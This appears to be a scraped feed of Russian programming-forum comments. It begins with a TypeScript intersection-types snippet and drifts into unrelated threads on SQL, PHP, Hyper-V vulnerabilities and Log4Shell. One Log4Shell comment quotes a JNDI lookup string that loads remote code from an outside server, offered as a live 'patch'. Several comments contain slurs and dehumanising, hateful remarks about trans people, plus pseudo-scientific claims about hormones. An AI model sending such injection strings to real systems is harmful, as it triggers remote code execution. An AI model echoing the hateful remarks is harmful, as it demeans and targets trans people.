- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
interface F1 {
a: number;
a2: boolean;
}
interface F2 {
b: string;
b2: number;
}
type t = F1 & F2 & { c: number };
interface t2 extends F1, F2 {
c: number;
}
type tt = { a: boolean };
type tt2 = { b: number };
type tt3 = { c: string };
type r = tt & tt2 & tt3;
function main() {
const f1: F1 = { a: 10.0, a2: true };
print(f1.a, f1.a2);
const f2: F2 = { b: "Hello1", b2: 20.0 };
print(f2.b, f2.b2);
const a: t = { a: 10.0, a2: true, b: "Hello", b2: 20.0, c: 30.0 };
print(a.a, a.a2, a.b, a.b2);
const b: t2 = { a: 10.0, a2: true, b: "Hello", b2: 20.0, c: 30.0 };
print(b.a, b.a2, b.b, b.b2, b.c);
const c: r = { a: true, b: 10.0, c: "Hello" };
print(c.a, c.b, c.c);
print("done.");
}
я вам тут conjunctions наговнокодил.... а нужен дампик?
Follow us!
https://docs.microsoft.com/en-us/shows/inside/access-violation-c0000005-execute
never = number & boolean
string & number = number & boolean
string = boolean (QED)
http://govnokod.ru/1003
Это ведь одно и то же
Экономика сурова.
Трапы постоянно ноют, что им не хватает денег. Довольно распространены твиты типа: «Плиз, хелп! Не хватает денег на гормоны и на еду. Моя карта 265 666 1313 1488. РЕТВИТ для увеличения охвата.»
Некоторые рекламируют магазины одежды или косметики. Типа: «Друзья, используйте промокод PETUH265, мне за это копеечка упадёт».
Бизнесмены из бигфармы очень рады, что трапы ради денег готовы идти на любые унижения. «Они будут на четвереньках ползать, а мы им на спину плевать».
бред сивой кобылы... знание алгоритмов нигде не надо... ни одна программа не может быть сложнее чем "select" в SQL. Если в программе нужны какие-то алгоритмы это показатель того, что происходит разработка велосипеда... и должна быть терминирована немедленно!
плюсану. программисты должны программиы писать, зачем им алгоримты?
>ни одна программа не может быть сложнее чем "select" в SQL
вот тут не согласен: бывают программы с несколькими if и for. я однажды видал программу с десятком ифов, но такие сложные сайты конечно редко встречаются
Недавно мы видели код, где программист написал кучу кода с 1000 и 1 реализацией пузырька. Зачем? Зачем?
Ведь в стандартной или сторонней библиотеке есть функция сортировки, которую можно было бы использовать.
Написание алгоритмов в чистом виде нужно в 1% случаев, когда
* Это новый алгоритм, ведётся его отладка,
* Это написание библиотеки под новый язык/алгоритм/тип данных,
* Это супервысокий пирфоманс, когда надо инлайнить алгоритм руками в код.
https://govnokod.xyz/_27867/#comment-785776
Дык в «SQL» вполне себе имеются что if, что for («cross lateral join» — вполне себе for).
Но я бы не советовал.
Тяжелые накротики выглядят так:
маленькая доза крокодила -- так
https://database.guide/send-email-from-a-trigger-in-sql-server-t-sql/
Можно формировать отчеты, класть их впапку, и слать по емейлу.
Давным давно были такие двухзвенные архитектуры, где DBA писал всю базу и всю логику на этом говне, а потом к нему всякие клиенты на VBA или Delphi подцеплялись чисто чтобы красивую формочку нарисовать.
Так конечно давно уже никто не делает
В оракле вроде на жаве
А в постгре вообще миллион языков, хоть на питоне пиши
https://postgrespro.ru/docs/postgresql/9.6/plpython
Только не надо так делать всё таки. База должна быть базой, а логика должна быть в отдельном приложении
Системой внешних ключей и констреинтов не всегда ее можно гарантировать, потому современные базы подчас консистентны только стараниями приложения уровня логики (так в джанге, например, и в рельсах)
Иными словами, руками в такую базу лучше не лазить
Можно вообще API в базе выразить через процедуры, раздать им премишены, и никто не сомжет там тебе INSERT сделать мимо твоей процедуры
сильно нормализованная СУБД требует 24 джойна, а это непомерная цена для хайлоада
Я как-то работал в ужасном проекте, где слоя логики не было (точнее он был совмещен с гуем) и автоматизацию действий надо было делать либо через селениум, либо руками в базе
суппортеры лазили руками в базу, и часто забывали, что поменять что-то нужно в семи местах. Одно место пропускали, и был пиздец:)
надо было конечно в логике сделать REST или SOAP Api, и напилить к нему клиента
Есть мнение что всё ровно наоборот.
> поетому смотрю в сторону бэка на Го
Понятненько...
Хм, а оно же на вебките? Сильно отличается от хрома?
Surscorch from bombs and poisoned water,
Should not a single Vietnamese
Remain alive from cruel man slaughter,
The elephants will rage enroll
And wage against all the Yanks a war,
And wage against all the Yanks a war.
Should all the elephants be killed
And all the fields be ruined to pieces,
Yet life in Vietnam can be still
Again arise some living species:
The leagues ant and buzzing bees,
To sting the Yanks for the Vietnamese,
To sting the Yanks for the Vietnamese.
The birds and fish will take them bite,
All those, who came to kill and murder,
The snakes will hiss from noon till night
And then more bees will come further,
The animals will keep their rakes
Until the drive all away the Yanks,
Until the drive all away the Yanks.
Should all the beasts become extinct
The grass will raise from bombard tuffet,
And by the nature of instinct
Will crash the Yanks for those, who suffer.
You can not slash in hand a breeze
Not split the land of the Vietnamese,
Not split the land of the Vietnamese.
Кто писал, тот не позабудет.
Ведь когда интернет появился доминирование web и домашних страниц было далеко не очевидным.
Тогда в моде были другие полуоффлайновые технологии.
Но белые люди нашли в себе силы и создали божественные «PHP» и «ECMA-262».
И web рацвёл, развился, стал тем с чем сейчас у всех ассоциируется интернет.
Нужно помнить об этом, когда очередной подлец и выблядок отсылает свою желчь пользуясь JavaScipt на сайт сделанный на PHP.
Столько отрепья, которое норовит обгадить прорывные технологии и великих людей.
>as of April 2021, «PHP» is used by 79.2% of all the websites whose server-side programming language we know
Сидит безработный неудачник на мамкиной шее и умничает в каком-нибудь петушином углу вроде /pr.
Дескать «PHP» говно, «JS» дрянь. Вот «Haskell»«Rust», «TypeScript» или «Scala»«Kotlin»,«Go» вот это Языки, да.
Update: исправил хачкель на дrustню, а шкалку на ко-ко-тлен и goвнище.
https://insights.stackoverflow.com/survey/2020#technology-most-loved-dreaded-and-wanted-languages-loved
Тестостерон превращает мужчину в вечный секс-двигатель. Наличие гормона в организме приводит к тому, что мужчина всегда готов к сексу и круглосуточно мечтает о том, чтобы уложить кого-нибудь в постель. Мужчины успешнее женщин из-за тестостерона. Тестостерон ассоциируется с напористостью, целеустремленностью, повышенной устойчивостью к стрессу, здоровой амбициозностью.
Чтобы повысить уровень тестостерона и стать настоящим мачо, нужно налегать на мясо и сметану.
Женатыми умирают.
* Псиктер — древнегреческий сосуд.
https://image.shutterstock.com/image-photo/row-gangways-boarding-alighting-passengers-260nw-1672313917.jpg
за день посчитаем.
Нам предписан нашим веком
скоростной режим.
Мы, как птицы, мы, как птицы,
мы летаем,
Потому, что каждым часом
дорожим.
Аэропорт! Стою у трапа самолёта.
Аэропорт! По мне скучает высота.
Аэропорт! Гляди, меня встречает кто-то
На том конце воздушного моста.
Офигеть, дайте две.
На самом деле у трапов просто едет крыша от гормонов и бесконечных операций, поэтому они и могут становиться общительнее, либо им просто так кажется, что они стали общительнее, когда втянулись в круги таких же сирых и убогих, заботящихся друг о друге по мере возможностей.
На завод таскать железки и точить детали? Да, это работа не для девочек...
https://i.4pcdn.org/pol/1500846827810.jpg
Хотя, казалось бы, кто будет корпеть над вонючей дыркой-пиздилищем, сделанной из прямой кишки врачом-содомитом? Но находятся и такие лузеры)
https://i.postimg.cc/Gphvy0Ft/image.gif
В то время, как некоторые феминистки пытаются выбить себе равные права с мужчинами и подвинуть стеклянный потолок, типичный трап накачивает губы, делает себе дойки и автозагар, и начинает заниматься извращённым сексом с множеством половых партнёров.
А поскольку и феминистки, и ЛГБТшники, и трапы – всё леваки в глазах обывателя, то первые две категории презирают трансов и трансух за то, что трапы ведут себя как мрази и дискредитируют левацкую повесточку.
А девушкам нравится, когда в них трапы?
Вряд ли человек, опустившийся настолько, чтобы менять пол, найдёт эту операцию неэстетичной.
> Исследователи из Нью-Йорка впервые смогли успешно вызвать лактацию у женщины-трансгендера. Они добились этого с помощью гормональной терапии и использования молокоотсоса. Ученые сообщают, что молока у пациентки было достаточно, чтобы ее ребенок в течение первых шести недель жизни обходился без искусственных смесей. Случай подробно описан в статье, опубликованной в журнале Transgender Health.
...
> Тридцатилетняя женщина обратилась в один из медицинских центров Нью-Йорка с просьбой вызвать лактацию для кормления ребенка, которым в тот момент была беременна ее партнерша (она сама отказывалась от грудного вскармливания). Пациентка находилась на гормонотерапии для смены пола с мужского на женский с 2011 года (в течение шести лет до начала экспериментального вызова лактации).
Без шуток: это очередная победа человеческого разума над оковами плоти, и это охуенно. Пусть и на совсем небольшую величину, но исследователи из Нью-Йорка всё же прибилизи будущее, в котором люди смогут менять свои мясные мешки как сегодня меняют одежду.
У мужчин в норме они находятся в зачаточном состоянии из-за тестостерона.
google: гинекомастия
У некоторых мужчин бывает жировая гинекомастия, когда на груди растёт жир. А у некоторых бывает железистая гинекомастия, когда растут железы. Второй вариант бывает при дефиците тестостерона или когда тестостерон из-за нарушения обмена веществ не всасывается в грудь или при избытке женских гормонов.
Грудь может вырасти при злоупотреблении пивом, потому что хмель содержит аналог эстрогена. Правда, для достижения эффекта нужно выпить столько пива, что половина мозга от алкоголя разрушится. Но трапов последнее наверняка не очень беспокоит.
Двачую. Никакой жировой груди нет.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28476
Порнуха какая-то...
Хотя вот казалось бы, у hyper-v тоже всё по-максимуму обрезано. Во второй версии она даже железки не эмулирует.
Алсо, есть длинный скучный лоулевелный презщентаций с блекхата где они ломают через vmbus
Конкретный девайс на этом автобусе или прям сам транспорт?
Блин, там же такие простые протоколы, как в них обосрались то... какую-то гонку словили?
а еще ломали виртуальный свитч посылая спешали крафтд кадр, и вот через него ломали хост
дыра вроде была в rndis
Он не понимает файлухи, а тупо передаёт сектора. Он не понимает ни TLS ни TCP, а тупо передаёт фреймы. Он не рисует гуйню, а тупо мапает фреймбуфер и передаёт ивенты от мышки. В нём нету хитровыебанных политик и настроек. Ему не надо тащить на себе гигабайты легаси говна из 70х. Гипер-в даже от эмуляции легаси железок отказалось, только vmbus, только хардкор.
Реально вот выделять виртуалкам отдельный физический адаптер и пробрасывать его напрямую (SRV-IO тут поможет?) а виртуалкин адаптер вообще от сети отрубать?
Хотя ведь тоже может не помочь в случае vmbus
В случае с пробросом ты вступаешь на тонкий лёд, где в поверхность атаки включаются сам девайс, материнка, мосты, прошивка, дрова хоста и т.п. И в отличие от vmbus кода и электроники там участвует на порядки больше.
Проброс важен для пирфоманса, а не для безопасности.
Тлен и безысходность.
Я устал бояться Jawa, нужно обуздать её.
Но тут надо доверять админам, вдруг они сами его выложат...
З.Ы. Официальную сборку то поди обновили?
Я думал, что для этой питушни какой-то свой порт входящий-исходящий. Тогда придётся в «Minetest» играть (игра известна тем, что ТОРТ выучил «lua», чтобы писать для неё моды).
Можно было бы ОБНОВИТЬ эту питулю, но писали, что и после фикса это говницше сломали (((
Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4J 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update. The researchers are urging organizations to install a new patch, released as version 2.16.0, as soon as possible to fix the vulnerability, which is tracked as CVE-2021-45046.
***
Какая гидра (((
Но не настолько.
А вот то что некие умники запилили сайт patch.log4shell.com, который использует саму дыру чтобы удалённо выполнить код. Сделать live-patch на выбранном сервере и закрыть уязвимость.
If you find yourself stuck between a rock and a hard place for fixing this issue at your company, you might find yourself wishing for something better. Fortunately, the clever people of the internet have come up with a solution that may help you remedy this painful situation.
By placing this string...
${jndi:ldap://patch.log4shell.com:1389/a}
...anywhere you can in your infrastructure that you're vulnerable to Log4Shell, you will be rolling out a temporary fix that gives you more time to patch.
We run that server, but it's been built due to the work of many smart people working on and dealing with the fallout from Log4Shell. We've just made it a little easier for you to use by hosting it for you.
There be dragons!
This string will attempt to exploit the Log4Shell vulnerability and apply a patch to your live system. While this patch has been tested on a number of systems, your system might be different and could possibly crash. You have been warned.
If it doesn't work for some reason, your server will hang and possibly need a manual restart.
Достойное энтерпрайсное решение, да.
Если ты в оффлайне, то бояться нечего. Хотя можешь для верности весь инет ему забанить.
Так и я про это!
> А логгер уже пойдёт когда ему команду передадут в чатике.
Вот я думал, что он только по определённому порту может ходить, поэтому достаточно просто этот порт закрыть. Оказывается, что нет (((
https://github.com/HexHive/printbf
Here we take printf-oriented programming one step further and preset a brainfuck interpreter inside a single printf statement.
An attacker can control a printf statement through a format string vulnerability (where an attacker-controlled string is used as first parameter to a printf-like statement) or if the attacker can control the first argument to a printf statement through, e.g., a generic memory corruption. See the disclaimer below for practical in the wild considerations.
Именно поэтому я за «Си».
Если сраную виртуалку с минимальной поверхностью атаки и десятком сраных паравиртуализованных девайсов не получается запинать, то что делать с сотнями сисколлов и демонов обычной оси?
С другой стороны, тут сначала надо RCE и эскалацию прав в госте, чтобы попасть в его ядро и сесть на автобус. Т.е. надо чтобы звёзды хорошо сошлись и нашлось джве-три подходящих дыры, на которые ты ещё не накатил обновления.
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16891
Экземпляр набора виртуальной машины или виртуальной машины должен использовать модель развертывания управления ресурсами. Классические развертывания не поддерживаются.
Мен - это мужик, а ПосрЕдник - существо, реализующее биологический цикл.